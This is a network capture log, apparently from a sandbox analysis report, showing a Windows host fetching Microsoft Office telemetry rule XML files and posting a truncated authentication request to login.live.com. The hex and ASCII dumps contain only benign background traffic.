2024-11-11 23:06:22 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49756	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:22 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 8317a370-b01e-0001-33d5-3346e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230622Z-174f7845968j6t2phC1EWRcfe800000005u0000000004q50 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:22 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:22 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:22 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 33d009d3-501e-007b-36d5-335ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230622Z-174f7845968swgbqhC1EWRmnb400000005sg000000009t85 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:22 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:22 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:22 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:22 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c8cfd17a-b01e-0053-1cd5-33cdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230622Z-174f7845968xlwnmhC1EWR0sv800000005f0000000007z5n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:22 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 1815df8f-001e-0028-27d5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968nxc96hC1EWRspw800000005a000000000dbmc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: feb354c0-101e-0079-0dd5-335913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968psccphC1EWRuz9s00000005w0000000007vq4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 55c0910e-d01e-0082-5dd5-33e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f78459684bddphC1EWRbht4000000057000000000rrpv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 1973b281-501e-0047-7bd5-33ce6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968j9dchhC1EWRfe7400000005h0000000001r4n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 9a2bdabf-a01e-0053-27d5-338603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968vqt9xhC1EWRgten00000005m000000000gphy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49746	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-11 23:06:23 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-11 23:06:23 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Mon, 11 Nov 2024 23:05:23 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C555_BL2 x-ms-request-id: d70f2401-3d7c-4985-bd68-37e44afee28f PPServer: PPV: 30 H: BL02EPF0001DA0B V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Mon, 11 Nov 2024 23:06:23 GMT Connection: close Content-Length: 1276
2024-11-11 23:06:23 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: 2f59f113-901e-002a-1dd5-337a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968v79b7hC1EWRu01s00000005b000000000009w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:23 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:23 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:23 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 87508168-a01e-0098-0bd5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230623Z-174f7845968glpgnhC1EWR7uec00000005t0000000007u7n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
